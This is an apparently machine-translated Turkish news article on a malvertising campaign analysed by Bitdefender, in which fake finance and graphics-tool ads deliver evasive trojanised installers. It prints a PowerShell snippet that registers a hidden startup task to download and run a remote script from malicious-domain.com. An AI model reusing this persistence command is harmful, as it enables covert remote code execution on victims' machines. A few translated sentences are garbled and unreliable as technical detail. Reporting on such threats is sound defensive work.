Son aylarda, siber güvenlik ekipleri, kötü niyetli aktörlerin Facebook ve Google reklam kanallarını meşru finansal hizmetler olarak maskelenecek şekilde kullandıkları endişe verici bir eğilim gözlemlediler.
Bu tehdit aktörleri, tanınmış ticaret platformlarına ücretsiz veya premium erişimi teşvik ederek, şüpheli olmayan kullanıcıları truva işlemlerini indirmeye başarıyla çekti.
Kampanyanın sosyal mühendislik taktikleri, tanıdık markalaşma ve doğrulanmış rozetlerden yararlanarak, gündelik incelemeyi atlayan bir özgünlük kaplaması yaratıyor.
Mağdurlar, otomatik analiz ve insan incelemesinden kaçınmak için tasarlanmış gizlenmiş yüklere doğru ücretli reklam yerleşimleri yoluyla yönlendirilir.
İlk enfeksiyonlar genellikle premium grafik araçlarına “bir yıllık ücretsiz erişim” vaat eden Facebook reklamlarını tıklamalarla başlar.
Kullanıcılar, genellikle AES-CBC ile şifrelenmiş ve meşru bir yürütülebilir dosyanın kisvesi altında kötü amaçlı bir yükleyici sunmak için StreamSaver.js aracılığıyla yüklenen özelleştirilmiş hizmet çalışanı komut dosyalarını barındıran açılış sayfalarına yönlendirilir.
İndirildikten sonra, büyük boyutlu yükleyici-bazen 700 MB’nin üzerinde-sanallaştırılmış ortamlarda yürütmeyi önleyerek sanal kutu önleme kontrollerini kullanır. Sadece bu savunmaları geçtikten sonra indirici çok aşamalı sürecini başlatır.
Bitdefender analistleri, bu ilk savunmaları ihlal ettikten sonra, kötü amaçlı yazılımların 30000 bağlantı noktasında bir WebSocket iletişim kanalına geçtiğini ve önceki kampanyalarda kullanılan eski HTTP tabanlı yaklaşımın yerini aldığını belirtti.
Tehdit oyuncusu ön uç JavaScript’ini şifreledi, daha sonra son yükü oluşturmak için çalışma zamanında bir deobfuscation rutini kullandı.
Bu dinamik yaklaşım en statik analiz araçlarını folyolar ve adli araştırmaların karmaşıklığını önemli ölçüde artırır.
Başarılı bir yürütme EdgeresourcesSstallerV12-ISSGsonraki PowerShell komut dosyalarını indiren ve yürütür Invoke-Expression.
Bu görev yalnızca sistem yeniden başlatmasında yeniden enfeksiyonu sağlamakla kalmaz, aynı zamanda Windows Defender ayarlarını yük dizinlerini hariç tutmak için değiştirir.
Aşağıdaki alıntı, planlanan görev kaydını göstermektedir:-
$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "Invoke-Expression $(Invoke-WebRequest -UseBasicParsing https://malicious-domain.com/next.ps1)"'
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'EdgeResourcesInstallerV12-issg' -Description 'Windows Edge resources updater'Enfeksiyon mekanizması
Enfeksiyon mekanizması, kötü niyetli işlemleri meşru analizlerle harmanlamak için hem hizmet çalışan API’lerini hem de modern web izleme çerçevelerini kullanan sofistike bir indirici bileşenine odaklanmaktadır.
.webp)
Facebook Pixel, Google Reklam Dönüşüm İzleme ve Microsoft ADS Pixel gibi üçüncü taraf piksellerin yanında etkinlik izleme için posthog’u entegre ederek, ön uç uygulaması kullanıcı davranışına görünürlük kazanır.
Bu telemetri, operatörlerin kötü amaçlı içeriği yalnızca yüksek değerli hedeflere seçici olarak dağıtmalarını sağlar ve diğerlerine iyi huylu sayfalar sunar.
Kullanıcı bir indirme başlattığında, servis çalışanı isteği keser, yükü çözer ve yükü çözer, daha sonra ikili dosyayı StreamSaver.js aracılığıyla dosya sistemine aktarır – geleneksel tarayıcı indirme korumalarını bypassing.
Domain rotasyonu ve dile özgü reklamlarla eşleştirilen bu kesintisiz dağıtım mekanizması, düşük bir profil korurken hızlı, yaygın yayılmayı mümkün kılar.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
